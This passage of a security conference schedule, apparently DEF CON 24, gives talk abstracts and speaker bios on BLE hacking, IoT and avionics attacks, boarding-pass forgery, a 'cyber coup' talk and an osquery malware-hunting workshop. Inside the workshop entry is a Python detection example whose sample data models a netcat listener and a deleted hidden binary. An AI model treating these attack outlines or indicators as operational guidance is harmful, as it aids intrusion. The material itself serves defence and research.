Specter is an awesome hardware hacker that loves to sniff protocols.
@redragonx
Return to Index
Wireless - Skyview 1 - Friday - 12:00-12:20
Jose Gutierrez
Bio
Jose is an academic researcher in wireless security with a focus on Bluetooth Low Energy. He has been a security professional for four years, working as a network defender and incident responder.
Ben Ramsey
Bio
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, Bluetooth Low Energy, and Insteon. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
How Do I "BLE Hacking"?
Abstract
Want to start hacking Bluetooth Low Energy (BLE)? Don't have the time to learn all the things? Look no further! The three goals for this talk: 1) Familiarization: you'll get the basics of the Attribute Protocol (ATT) and the Generic Attribute Profile (GATT); 2) Tools: a quick look at essential tools such as bluez, bleno, ubertooth, PyBT, crackle, scapy, as well as our custom tools, and how to use them; and 3) Fun: along the way, we'll show you how to impose your will on a set of commercially available industrial sensors using techniques like passive credential sniffing, BLE server cloning and impersonation, and reverse engineering at the application layer.
Why? There's arguably no better time to get into BLE security, as it continues to proliferate in a wide variety of markets. Some of the more interesting BLE stuff you can buy includes: breathalyzers, pad/bike/door locks, fitness trackers, heart rate monitors, temperature sensors, data loggers, fluid pressure gauges, water well depth readers, garage door openers, automotive OBDII sensors, pressure cookers, running socks, prosthetics, and, you guessed it, baby pacifiers.
Return to Index
IOT - Bronze 4 - Saturday - 12:10-12:59
How the Smart-City becomes Stupid
Denis Makrushin, Kaspersky Lab, Global Research and Analysis Team.
Scare stories around the Internet of Things (IoT) conjure up images of bad guys in hoodies, living for hacking and making the lives of other people harder, inventing millions of ways to infiltrate your life through your gadgets. Probably nobody cares about their smart-home security, but what about Smart-City threats, which affect billions of people? A huge number of public IoT devices are vulnerable to potential abuse, potentially endangering users' data, the networks of the companies they belong to, or both. Based on research of various public devices, such as terminals and cameras, we offer a methodology for security analysis of these devices, which would answer the following questions:
How easy is it to compromise a terminal in the park?
What can hackers steal from there?
What can be done with a hacked device?
How can the internal network of the installer organization be penetrated?
How to protect public devices from attacks?
This topic is a unique opportunity to hear about real cases of public device hacking and to see the process of compromising different terminals from beginning to end:
Parking and ticket terminals
Information terminals in museums/cinemas/whatever else
Hotels infrastructures
Airport infrastructure
Road Cameras/speed radars
Topic includes:
Methodology for security analysis of public IoT
Post-exploitation scenarios
Methodology for improving the security of these devices
Non-trivial protection for non-trivial device
Exclusive research of non-trivial IoThings, a lot of proofs with video-demonstration. "Watch Dogs" in real life.
Denis Makrushin is an expert of the Global Research and Analysis Team at Kaspersky Lab. He graduated from the Information Security Faculty of National Research Nuclear University. Specializes in analysis of possible threats and follows the Offensive Security philosophy. At this time, he continues his researches Targetted Attack detection based on Game Theory methods in graduate school of MEPhI.
Social media links if provided.
Vladimir Daschenko
@difezza
Return to Index
CPV - Bronze 1 - Friday - 19:00-20:00
Talk Title:
How to backdoor Diffie-Hellman
Speaker Name, Employer or position:
David Wong - Security Consultant at NCC Group
Abstract:
Lately, several backdoors in cryptographic constructions, protocols and implementations have been surfacing in the wild: Dual-EC in RSA's B-Safe product, a modified Dual-EC in Juniper's operating system ScreenOS and a non-prime modulus in the open-source tool socat. Many papers have already discussed the fragility of cryptographic constructions that do not use nothing-up-my-sleeve numbers, as well as how such numbers can be safely picked. However, the question of how to introduce a backdoor into an already secure, safe and easy-to-audit implementation has so far rarely been researched (publicly).
Bio:
David Wong is a Security Consultant at the Cryptography Services team of NCC Group. He has been working in Security for over a year now, being part of several publicly funded open source audits such as the OpenSSL and the Let's Encrypt ones. He has conducted research in many domains in cryptography, publishing whitepapers as well as writing numerous editions of the Cryptography Services private bulletin. He has been a trainer for cryptography courses at BlackHat US 2015 and BlackHat US 2016.
Social media links if provided:
@lyon01_david
Return to Index
DEFCON - Track One - Friday - 14:00-14:59
How to Design Distributed Systems Resilient Despite Malicious Participants
Radia Perlman EMC Fellow
Often distributed systems are considered robust if one of the components halts. But a failure mode that is often neglected is when a component continues to operate, but incorrectly. This can happen due to malicious intentional compromise, or simple hardware faults, misconfiguration, or bugs. Unfortunately, there is no single add-on to designs that will fix this case. This talk presents three very different systems and how they each handle resilience despite malicious participants. The problems, and the solutions, are very different. The important message of this talk is that there is no one solution, and that this case must be considered in designs.
Radia Perlman is a Fellow at EMC. She has made many contributions to the fields of network routing and security protocols including robust and scalable network routing, spanning tree bridging, storage systems with assured delete, and distributed computation resilient to malicious participants. She wrote the textbook Interconnections, and cowrote the textbook Network Security. She holds over 100 issued patents. She has received numerous awards including lifetime achievement awards from ACM's SIGCOMM and Usenix, election to the National Academy of Engineering, induction into the Internet Hall of Fame, and induction into the Inventor Hall of Fame. She has a PhD from MIT.
Return to Index
DEFCON - Track One - Sunday - 10:00-10:59
How to Do it Wrong: Smartphone Antivirus and Security Applications Under Fire
Stephan Huber Fraunhofer SIT
Siegfried Rasthofer Fraunhofer SIT & TU Darmstadt
Today's evil often comes in the form of ransomware, keyloggers, or spyware, against which AntiVirus applications are usually an end user's only means of protection. But current security apps not only scan for malware, they also aid end users by detecting malicious URLs, scams or phishing attacks.
Generally, security apps appear so self-evidently useful that institutions such as online-banking providers even require users to install anti-virus programs. In this talk, however, we show that the installation of security applications, at least in the context of smartphones, can sometimes open the phone to a number of attack vectors, making the system more instead of less vulnerable to attacks.
In recent research, we examined Android security apps from renowned vendors such as Kaspersky, McAfee, Androhelm, Eset, Malwarebytes and Avira. When we studied the apps' security features (Antivirus and Privacy Protection, Device Protection, Secure Web Browsing, etc.), it came as a shock to us that every inspected application contained critical vulnerabilities, and that in the end not a single one of the promoted security features proved to be sufficiently secure. In a simple case, we would have been able to harm the app vendor's business model by upgrading a trial version into a premium one at no charge.
In other instances, attackers would be able to harm the end user by completely disabling the malware-scanning engine remotely. Or how about accessing confidential data by exploiting broken SSL communication, broken self-developed "advanced" crypto implementations or SQL injection?
Yes, we can. On top of that, we were able to bypass the secure browsing protection and abuse it for code execution. The most alarming findings, however, were security applications that we were able to actually turn into a remote access trojan (RAT) or into ransomware. In light of all these findings, one must seriously question whether the advice to install a security app onto one's smartphone is wise. In this talk, we will not only explain our findings in detail but also propose possible security fixes.
Stephan Huber is a security researcher in the testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He has found various vulnerabilities in well-known Android applications and in the AOSP. In his spare time he enjoys teaching students Android hacking.
Siegfried Rasthofer is a fourth-year PhD student at TU Darmstadt (Germany) and Fraunhofer SIT, and his main research focus is applied software security of Android applications. He has developed various tools that combine static and dynamic code analysis for security purposes. He likes to break Android applications and has found various AOSP exploits. Most of his research is published at top-tier academic conferences, and very recently he started publishing at industry conferences like BlackHat, VirusBulletin and AVAR.
Return to Index
WOS - Skyview 6 - Saturday - 11:10-11:59
How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really)
Larry W. Cashdollar, Senior Security Intelligence Response Team Engineer at Akamai Technologies.
I'll discuss my methodology in attempting to download all 50,000 WordPress plugins, automated vulnerability discovery, automated proof of concept creation and automated proof of concept verification. I'll go into where I went wrong, what I'd change and where I succeeded.
Larry W. Cashdollar (Twitter: @_larry0) has been working in the security field and finding vulnerabilities for over 15 years. With over 100 CVEs to his name, he is a known researcher in the field. You can see many of the disclosed vulnerabilities at vapidlabs.com. He is a member of the SIRT at Akamai Technologies.
Return to Index
DEFCON - DEF CON 101 - Sunday - 10:00-10:59
How to get good seats in the security theater? Hacking boarding passes for fun and profit.
Przemek Jaroszewski CERT Polska/NASK
While traveling through airports, we usually don't give a second thought to why our boarding passes are scanned at various places. After all, it's all for the sake of passengers' security. Or is it? The fact that boarding pass security is broken has been proven many times by researchers who easily crafted their own passes, effectively bypassing not just 'passenger only' screening, but also no-fly lists. Since then, not only have the security problems not been solved, but boarding passes have become almost entirely bar-coded. And they are increasingly often checked by machines rather than humans. Effectively, we're dealing with simple unencrypted strings of characters containing all the information needed to decide on our eligibility for fast lane access, duty-free shopping, and more...
With a set of easily available tools, boarding pass hacking is easier than ever, and the checks are mostly security theater. In my talk, I will discuss in depth how boarding pass information is created, encoded and validated. I will demonstrate how easy it is to craft your own boarding pass that works perfectly at most checkpoints (and explain why it doesn't work at others).
I will also discuss IATA recommendations, security measures implemented in boarding passes (such as digital signatures) and their (in)effectiveness, as well as the responses I got from different institutions involved in handling boarding passes. There will be some fun, as well as some serious questions that I don't necessarily have good answers to.
Przemek Jaroszewski has been a member of CERT Polska (part of the Research and Academic Computer Network in Poland) since 2001, where his current position is head of incident response. He started his education as a programmer at Warsaw University of Technology, eventually getting his master's degree in Social Psychology from the University of Social Sciences and Humanities in Warsaw. A frequent flyer in both his professional and private life, and a big aviation enthusiast, he uses every opportunity to learn about everything from the inner workings of airports, airlines, ATC etc. to life-hacking of loyalty programs.
Return to Index
DEFCON - Track Three - Friday - 13:00-13:59
How to Make Your Own DEF CON Black Badge
Mickey Shkatov (@Laplinker) Intel Advanced Threat Research
Michael Leibowitz (@r00tkillah) Senior Trouble Maker
Joe FitzPatrick (@securelyfitz) Instructor & Researcher, SecuringHardware.com
Dean Pierce (@deanpierce) Security Researcher, Intel
Jesse Michael (@jessemichael) Security Researcher, Intel
Kenny McElroy (@octosavvi) Hacker
Yes, we did, we made our own DEF CON black badges. Why? Because we didn't want to wait in line ever again-- Not really. We are a bunch of hackers that always look for a challenge, and what better challenge is there than to try and reverse engineer from scratch three DEF CON black badges? In this talk we will go through the 2 year long process of making the DC14, DC22 and DC23 Black badges which include amazing hacking techniques like social engineering, patience, reverse engineering, EAGLE trickery, head to desk banging and hoping it is passable to a goon and not shameful to DT, 1057, and Joe.
Mickey (@laplinker) is a security researcher and a member of the Advanced Threat Research team. His areas of expertise include vulnerability research, hardware and firmware security, and embedded device security. Mickey has presented some of his past research at DEF CON, Black Hat, BruCON, Bsides PDX, PacSec, and HES.
Twitter: @laplinker
Michael has done hard-time in real-time. An old-school computer engineer by education, he spends his days championing product security for a large semiconductor company. Previously, he developed and tested embedded hardware and software, dicked around with strap-on boot roms, mobile apps, office suites, and wrote some secure software. On nights and weekends he hacks on electronics, writes DEF CON CFPs, and contributes to the NSA Playset.
Twitter: @r00tkillah
Joe FitzPatrick is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, hardware penetration testing, and hardware security training. In between training and bricking hardware, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects.
Twitter: @securelyfitz
Dean Pierce is a computer security researcher from Portland, Oregon. Dean has 15 years of experience in the field, with former DEF CON talks on breaking WiFi, WiMAX, and GSM networks. Author of many silly tools, creator of many silly websites. Security researcher by night, and security researcher that gets paid by day, Dean is currently doing tool development and attack modeling on Intel Corporation’s internal penetration testing team.
Twitter: @deanpierce
Jesse Michael spends his time annoying Mickey and finding low-level hardware security vulnerabilities in modern computing platforms.
Twitter: @jessemichael
Kenny McElroy is a Security Researcher, Lock picker, Tinkerer, Embedded hacker, Jam Skater, SMT solderer, SDR twiddler, Space Geek and Bluewire Artist.
Twitter: @octosavvi
Return to Index
DEFCON - Track One - Saturday - 10:00-10:59
How to Overthrow a Government
Chris Rock Founder and CEO, Kustodian
Direct from the mind of the guy who brought you the "I will kill you" presentation at DEF CON 23 is another mind-bending, entertaining talk. This time it's bigger and badder than before.
Are you sick and tired of your government? Can't wait another 4 years for an election? Or do you want to be like the CIA and overthrow a government overseas for profit or fun? If you answered yes to one or more of these questions, then this talk is for you! Why not create your own cyber mercenary unit and invoke a regime change to get the government you want installed? After all, if you want the job done right, sometimes you have to do it yourself.
Find out how, over the last 60 years, governments and resource companies have been directly involved in architecting regime changes around the world using clandestine mercenaries to ensure deniability. This has been achieved by destabilizing the ruling government, providing military equipment, assassinations, financing, training rebel groups and using government agencies like the CIA, Mossad and MI-5, or using foreign private mercenaries such as Executive Order and Sandline. Working with Simon Mann, an elite ex-SAS soldier turned coup architect who overthrew governments in Africa, Chris Rock will show you how mercenary coup tactics apply directly to digital mercenaries causing regime changes as the next generation of "Cyber Dogs of War".
Chris will walk you through a cyber regime change from start to finish on a real country and show you how to architect a coup achieving the same result as a traditional mercenary operation without any blood spilt. This will include taking ownership of all facets of government including finance, telecommunications, transportation, commercial companies and critical infrastructure such as power, water and oil. You will learn:
• Traditional military mercenary coup tactics used by the infamous 32 Battalion in Africa, Executive Order and Sandline that can be directly applied to a cyber mercenary regime change.
• How to architect a cyber coup using advisors, hackers and the general populace, using misinformation, professional agitators, false information and financing.
• How to gather intelligence to analyze a government's systemic weaknesses in its finances, societal values and political climate, specific to the leader or country, in order to structure your attack.
• How to identify and prioritize government resources, infrastructure and commercial companies, and how to use these compromised assets to stage the coup.
• How to combine physical and digital techniques and have the best of both worlds to own a country's infrastructure.
• How to manipulate the media using propaganda targeting journalists' flawed multiple-"source" rules for a story.
• The grand finale of a cyber regime change on a real country from beginning to end using the above techniques, with operational footage. Come to this talk and find out how you too can be your own dictator; benevolent or merciless, that part is up to you.
Chris Rock, who presented "I will kill you" at DEF CON 23, has been active in the security industry for the last 20 years and is the founder and CEO of Kustodian, a security company that specializes in Security Operations Centres, penetration testing and independent research. Kustodian is an Australian, Middle East and Hong Kong registered company that has been operational for over 10 years. Chris has also spent 12 years in the banking sector and provides security services around the world for small, medium and large companies. Chris Rock also created SIEMonster, an open source, scalable, free Security Incident and Event Management (SIEM) as a commercial alternative to Splunk, ArcSight and AlienVault. SIEMonster can be run on Amazon AWS or virtual machines, and details can be found on www.siemonster.com
Twitter: @_kustodian_
Facebook
Return to Index
DEFCON - Track One - Friday - 15:00-15:59
How to Remote Control an Airliner: Security Flaws in Avionics
Sebastian Westerhold KF5OBS
This talk exposes critical flaws in navigational aids, secondary surveillance radar, the Traffic Collision Avoidance System (TCAS) and other aviation-related systems. The audience will gain insight into the inner workings of these systems and how they can be exploited. Several practical demonstrations on portable avionics will show just how easy it is to execute these exploits in real life.
Sebastian Westerhold, better known under his FCC-assigned radio call-sign KF5OBS, is a well-known electrical engineer with a general interest in security analysis and penetration testing. As a teenager, he wrote articles for the leading German electronics magazine FUNKAMATEUR and the leading European magazine Elektor. Today, his blog and YouTube channel attract electronics enthusiasts from all over the world.
Return to Index
SE - Palace 2-5 - Saturday - 19:00-19:55
Steven Zani
Dr. Steven J. Zani holds a PhD in Comparative Literature, an MA in Philosophy, and Bachelor's degrees in English, Philosophy and French. He has taught at the university level for over twenty years and served multiple years as a department chair. Currently he works as the Faculty Development Director, overseeing over 500 faculty and staff at Lamar University, in the Texas State University System, in Beaumont, TX.
Description: What can defunct C.I.A. Manuals, radical lesbian separatists, and an 18th century Romantic essayist teach you about engineering the world to be a better place? We often think about social engineering either on the small-scale – how can one operate in individual conversations to manipulate others for data, access, or specific, immediate purposes – or we think about engineering on a large scale, how politicians or other popular figures embrace and direct a culture. But what about the mid-range? This non-technical paper briefly addresses the techniques and histories of large and small-scale social engineering in order to address the middle ground. This presentation by someone with years of experience with staff and faculty at a state institution will discuss social-engineering on the job, on committees, and dealing with small, educated and uneducated collectives.
Return to Index
BHV - Skyview 4 - Sunday - 12:00-12:59
Speaker: Jay Radcliffe
About Jay:
Jay Radcliffe has been working in the computer security field for over 20 years. Coming from the managed security services industry, Jay has used just about every security device made over the last decade. Recently, Jay presented ground-breaking research on security vulnerabilities in medical devices, and was featured on national television as an expert on medical device vulnerability. Jay also has experience with hardware hacking and radio technology. Jay holds a Master's degree in Information Security Engineering from SANS Technology Institute, as well as a Bachelor's degree in Criminal Justice/Pre-Law from Wayne State University. SC Magazine named him one of the Top Influential IT Security Thinkers in 2013.
One of the huge criticisms of security research is the lack of process and adherence to traditional research methods. Quite often our "research" is just tearing apart systems and exposing their vulnerabilities. While this is useful, there is a better way. This talk will walk through the process of how I used the scientific method to conduct the research that led to my 2011 insulin pump findings. By changing just a couple of steps in our research, I think that we can bring more outside credibility to our hard and important work.
Return to Index
BHV - Skyview 4 - Sunday - 13:00-13:59
Speaker: dlaw and razzies
About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
About Darren Lawless:
Darren Lawless is a security analyst with 14+ years of plugging dikes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple of years, resulting in forays, experimentation, and investigation into nootropics, biofeedback, augmentation, implantation, brain stimulation, and sundry wet-tech bad-assedness.
“Genomics saved my life.” – Jen
“My father can rot in hell.” - Darren
How is personalized medicine important? Should I get a genomic test? Is the Illuminati collecting my data? What can I learn from genetic testing? What are the risks? How do I choose a test? Will my doctor hate me if I get a genetic test?
These questions won’t be answered in thirty minutes, but we offer grist for the discussion mill.
We will present two personal stories on how genomics can have a real effect on your medical treatment, your understanding of who you are, and how you live your life.
Return to Index
WOS - Skyview 6 - Saturday - 12:10-12:59
HTTP/2 & QUIC - Teaching Good Protocols To Do Bad Things
Catherine (Kate) Pearce, Senior Security Consultant at Cisco Security Services
Vyrus, Senior Security Consultant at Cisco Security Services
The meteoric rise of SPDY, HTTP/2, and QUIC has gone largely unremarked upon by most of the security field. QUIC is an application-layer UDP-based protocol that multiplexes connections between endpoints at the application level, rather than the kernel level. HTTP/2 (H2) is a successor to SPDY, and multiplexes different HTTP streams within a single connection. More than 10% of the top 1 million websites are already using some of these technologies, including most of the 10 highest-traffic sites. Whether you multiplex out across connections with QUIC, or multiplex into fewer connections with HTTP/2, the world has changed. We have a strong sensation of déjà vu with this work and our 2014 Black Hat USA MPTCP research. We find ourselves discussing a similar situation in new protocols, with technology stacks evolving faster than ever before, and network security is largely unaware of the peril already upon it. This talk briefly introduces QUIC and HTTP/2, covers multiplexing attacks beyond MPTCP, discusses how you can use these techniques over QUIC and within HTTP/2, and discusses how to make sense of and defend against H2/QUIC traffic on your network. We will also demonstrate, and release, some tools with these techniques incorporated.
Catherine (Kate) Pearce (Twitter: @secvalve) is a Senior Security Consultant for Cisco, based in Wellington, New Zealand. Formerly a Security Consultant for Neohapsis in the USA, she has engaged with a widespread and varied range of clients to assist them in understanding their current security state, adding resilience into their systems and processes, and managing their ongoing security risk. Day-to-day she undertakes a mix of advising clients about their security, client-focused security assessments (such as penetration tests), and security research. She has spoken about her work at many security conferences, including Black Hat USA, Source Boston, Nolacon, Kiwicon, ACSC and several others. While she has recently presented on network security, her true loves are application security enablement, complex systems security, and cross-discipline security analogues.
Carl Vincent (Twitter: @vyrus001) is a Customer Solutions Consultant for the recently consolidated Cisco Security Solutions group, where he performs a variety of security assessment types. As an information security professional, as well as personal hobbyist, his passion is to continually research ever increasingly elaborate methods of elegantly executed hypothetical crime. He also practices personal information warfare, and most of his biographic details online are somewhat exaggerated.
Return to Index
SE - Palace 2-5 - Saturday - 16:00-16:55
Cyni Winegard & Bethany Ward
Cyni: Cyni Winegard is currently an information security analyst with TraceSecurity. Starting her career as a systems administrator at a financial institution, she has moved into the information security industry and fallen in love with pen testing and social engineering. Cyni has a Bachelor of Science degree in history with a minor in anthropology from Florida A&M University and is currently working on a Master's in Cyber Security, as well as a Graduate Certificate in Terrorism and Homeland Security. She enjoys applying anthropological concepts to social engineering projects, and is passionate about compromising users. If not lost in cyberspace, Cyni can most likely be found practicing krav maga or seeking her soulmate (in the form of pizza).
Bethany: Bethany Ward fell in love with information security and digital forensics while pursuing a Bachelor of Science in Computer Science from the University of Arkansas. After graduation, she began her career in network security by joining TraceSecurity as an Information Security Analyst. In this position, she currently performs security assessments, pen-testing, social engineering, and audits for financial institutions. When not having way too much fun developing her pen-testing skills, Bethany enjoys volunteering with STEM-Up and geeking out over superheroes.
Return to Index
BHV - Skyview 4 - Friday - 17:30-17:59
Speakers: Charles Tritt
About Charles:
Dr. Charles Tritt has been a professor of biomedical engineering for over 25 years. His academic credentials include a Ph.D. in chemical engineering and an M.S. in biomedical engineering. His teaching has ranged from introductory cell biology and genetics to biomedical mechatronics. Over the past several years, he has become interested in exploring the potential of hobbyist-grade equipment as a vehicle for low-cost and accessible medical devices, and the corresponding ethical and legal implications.
Abstract:
In this demonstration, readily available and inexpensive (about $100 total cost) equipment will be used to relay conscious motor activity from one human subject to another. Specifically, transcutaneous electrodes and a bio-amplifier will be used to produce an electromyogram (EMG) signal from the lower arm of the controlling subject. This signal will be digitized and processed using an embedded microcontroller evaluation board (an Arduino UNO could also be used) which in turn will activate a relay to apply transcutaneous electrical nerve stimulation to the ulnar nerve of the controlled subject. Motions of the controlled subject’s fingers will involuntarily replicate those of the controlling subject.
Return to Index
Workshops - Las Vegas Ballroom 3 - Thursday - 15:00-19:00
Hunting Malware at Scale with osquery
Sereyvathana Ty Security Engineer, Facebook
Nick Anderson Security Engineer, Facebook
Javier Marcos de Prado Security Engineer, Uber
Teddy Reed Security Engineer, Facebook
Matt Moran Security Engineer Facebook
This workshop is an introduction to osquery, an open source, SQL-powered operating-system instrumentation and analytics framework. osquery is developed and used by Facebook to proactively hunt for abnormalities. Since osquery allows us to easily ask questions about our infrastructure, it provides powerful capabilities, such as finding malware persistence techniques and scanning for IOCs across our fleets of machines. This workshop is very hands-on and we expect participants to be comfortable with the CLI. The workshop is broken into three components:
Part I - hunting malware with osquery (1.5 hours) The first section of the workshop will make use of the interactive osquery command line tool (osqueryi) to hunt for characteristics of malware residing on a local system. The goal of this section is to get students familiar with writing SQL statements and to understand how osquery makes use of core tables to abstract operating system artifacts.
Part II - osquery at scale (1.5 hours): The second part of the workshop will focus on automation and deployment of osquery at a larger scale. You will learn how to write “query packs” which are utilized to collect and analyze the results from various endpoints in an enterprise. We will demonstrate this concept with the use of virtual machines, however the methodologies can be extrapolated to larger enterprises.
Part III - osquery development (optional - 0.5 to 1 hour): The last part of the workshop focuses on osquery development. We will walk you through some of the core components of osquery so you can have a deeper understanding of the application. The goal is to give the student sufficient information to hack on the osquery project. This segment is largely optional and designed for people who want to get familiar with how osquery works under the hood.
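As an added example (not workshop material), the two hunts below run against an in-memory SQLite database seeded with constructed rows shaped like osquery's processes and listening_ports tables. The column subset is assumed to match osquery's schema; because osquery's SQL dialect is SQLite, the same SELECT statements can be pasted into osqueryi unchanged. The last function serialises the hunts as a query pack in the JSON layout osquery's scheduler loads, which is the Part II step of running the same questions fleet-wide.

```python
import json
import sqlite3

# Constructed sample rows standing in for osquery's "processes" and
# "listening_ports" tables (only the columns the hunts need are modelled).
PROCESSES = [
    # pid, name, path, parent, on_disk (1 = executable still present on disk)
    (1, "systemd", "/usr/lib/systemd/systemd", 0, 1),
    (1337, "sshd", "/usr/sbin/sshd", 1, 1),
    (2001, "nc", "/home/dev/nc", 1, 1),
    (4242, "kworker", "/tmp/.x/kworker", 1, 0),  # binary deleted after launch
]
LISTENING_PORTS = [
    # pid, port, protocol (6 = TCP), address
    (1337, 22, 6, "0.0.0.0"),
    (2001, 8080, 6, "127.0.0.1"),
    (4242, 4444, 6, "0.0.0.0"),
]

# Each hunt is written exactly as it would appear in an osquery query pack.
HUNTS = {
    "deleted_binary": {
        "query": "SELECT pid, name, path FROM processes WHERE on_disk = 0 ORDER BY pid;",
        "interval": 600,
        "description": "Running process whose executable has been removed from disk",
    },
    "listener_outside_system_paths": {
        "query": (
            "SELECT p.pid, p.name, p.path, l.port FROM listening_ports AS l "
            "JOIN processes AS p USING (pid) "
            "WHERE p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/bin/%' "
            "AND p.path NOT LIKE '/sbin/%' ORDER BY p.pid;"
        ),
        "interval": 600,
        "description": "Listening socket owned by a binary outside the system paths",
    },
}


def build_fleet_db():
    """Create the in-memory stand-in for one host's osquery tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT, parent INTEGER, on_disk INTEGER)")
    conn.execute("CREATE TABLE listening_ports (pid INTEGER, port INTEGER, protocol INTEGER, address TEXT)")
    conn.executemany("INSERT INTO processes VALUES (?,?,?,?,?)", PROCESSES)
    conn.executemany("INSERT INTO listening_ports VALUES (?,?,?,?)", LISTENING_PORTS)
    return conn


def run_hunts(conn, hunts=HUNTS):
    """Run every hunt interactively (what osqueryi does) and return {hunt: [pids]}."""
    return {name: [row[0] for row in conn.execute(h["query"])] for name, h in hunts.items()}


def make_query_pack(hunts=HUNTS, platform="linux"):
    """Serialise the hunts as an osquery query pack for scheduled, fleet-wide collection."""
    return json.dumps({"platform": platform, "queries": hunts}, indent=2)


if __name__ == "__main__":
    print(run_hunts(build_fleet_db()))
    print(make_query_pack())
```

The first hunt flags pid 4242 (a process whose binary was unlinked after execution, a common way to frustrate disk-based scanning); the second flags 2001 and 4242 (listeners whose binaries live outside the usual system paths). Neither result is a verdict on its own; in a pack they are the scheduled questions whose rows are shipped to the log pipeline for correlation.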
Who should attend?
This workshop is designed for information security professionals who defend small to large scale enterprise networks.
What you need to know?
- Linux/Mac operating systems and CLI environments
- Comfortable writing and operating in SQLite
- Knowledge of ELK stack or Splunk deployment/functionality is helpful
- Some programming experience is helpful
- General knowledge of malware TTPs is helpful
What do you need to bring?
- A laptop capable of running two virtual machines (2 cores +, 8GB RAM, and 40GB free disk space)
- Pre-installed VMware client
Sereyvathana Ty is a member of Detection Infrastructure at Facebook working on network security monitoring instrumentations. Before joining Facebook, he was a malware researcher for Palo Alto Networks where he was researching new techniques for detecting malware and developing mitigation strategies for WildFire, a malware analysis platform. He enjoys malware analysis, and he has a strong passion for developing security applications using machine learning techniques.
Javier Marcos is a Security Engineer at Uber with experience working on both offensive and defensive teams. He is currently a member of Uber's Platform Security team and he created the Facebook CTF platform.
Nick Anderson is a Security Engineer at Facebook working in the Detection Infrastructure team on the osquery project. He came to Facebook after working at Sandia National Laboratories as a Cybersecurity Engineer and enjoys malware analysis and reverse engineering in his free time.
Teddy Reed is a Security Engineer at Facebook developing production security tools. He is very passionate about trustworthy, safe, and secure code development. He loves open source and collaborative engineering when scale, resiliency, and performance enable defensive and protective software design. Teddy has published at security conferences on trusted computing, hardware trusted systems, UAVs, competition game theory, and other security-related research.
Matt Moran is a security engineer at Facebook working on building and improving network security monitoring tools. In the past, Matt worked as a system administrator deploying and maintaining scalable services for both Facebook and Yahoo. Matt has a bachelor’s degree in Information Technology from Mount Saint Mary college in New York.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop capable of running two virtual machines (2 cores +, 8GB RAM, and 40GB free disk space). Pre-installed VMware client.
Return to Index
Wireless - Skyview 1 - Friday - 18:00-18:50
Kat Sweet
Bio
Kat Sweet wrote her first line of code in her mid-twenties and never looked back. Now she's a network security student at Madison Area Technical College, where she also serves as president of her school's IT student organization. Outside of class, you can find her fixing other people's computers, teaching, and wielding pointy objects (mainly lockpicks and knitting needles). She has a ham radio Extra class license, and organizes ham exams for CircleCityCon. Combining her passions for infosec and terrible puns, she interns as a SOC monkey.
@TheSweetKat
I Amateur Radio (And So Can You!)
Abstract
Ham radio: it's the 100-year-old technology that refuses to die. Whether you're a wireless enthusiast, electronics tinkerer, or just someone who wants to be able to communicate during the zombie apocalypse, having a ham radio license can open a new world of possibilities for any hacker. Come learn how and where to get your license, what you can expect to study, how you can work radio into your everyday hacking, and anything else you ever wanted to know about ham radio but were afraid to ask.
Return to Index
DEFCON - Track Two - Saturday - 10:00-10:59
I Fight For The Users, Episode I - Attacks Against Top Consumer Products
Zack Fasel Managing Partner, Urbane
Erin Jacobs Managing Partner, Urbane
This is not just another "I found a problem in a single IOT device" talk. Focusing on attacking three major consumer product lines that have grown rapidly in the past years, Zack and Erin will review flaws they’ve discovered and weaponized against home Windows installs, DIY security solutions, personal fitness tracking devices, and digital notification devices. We’ll review the security of these popular products and services in a ‘consumer reports’ style walkthrough, the attack methods against the 21 devices reviewed, release some tools for the lulz, and highlight the threats facing similar products. It's time to Fight for the Users. END OF LINE.
Zack Fasel and Erin Jacobs are Partners at Urbane Security, a solutions-focused vendor-neutral information security services firm focusing on providing innovative defense, sophisticated offense and refined compliance services.
Heading up Urbane's Research and Security Services divisions, Zack brings his years of diverse internal and external experience to drive Urbane's technical solutions to organizations top pain points. His previous research and presentations at conferences have spread across numerous domains including Windows authentication flaws, femtocells, open source defensive security solutions, cloud security, and unique network and application attack vectors. When not selling out, he can be found lost in the untz unce wubs, dabbling in instagram food photography, or eating scotch and drinking gummy bears (that's right, right?). More information on Zack can be found by searching for "zfasel" and on Urbane Security at UrbaneSecurity.com.
Leading the charge of Urbane's Compliance and Enterprise Risk Management divisions, Erin brings her years of executive-level experience coupled with deep and diverse technical knowledge to help organizations accurately prioritize and address the security and compliance risks they face. Her prior talks and research have spread across numerous domains, including technical solutions for compliance requirements, OSX reversing, diversity in tech, and IOT. More information on Erin can be found by following @SecBarbie on twitter.
Twitter: @UrbaneSec @zfasel @SecBarbie
Return to Index
DEFCON - Track Three - Saturday - 16:00-16:59
I've got 99 Problems, but Little Snitch ain't one
Patrick Wardle Director of Research, Synack
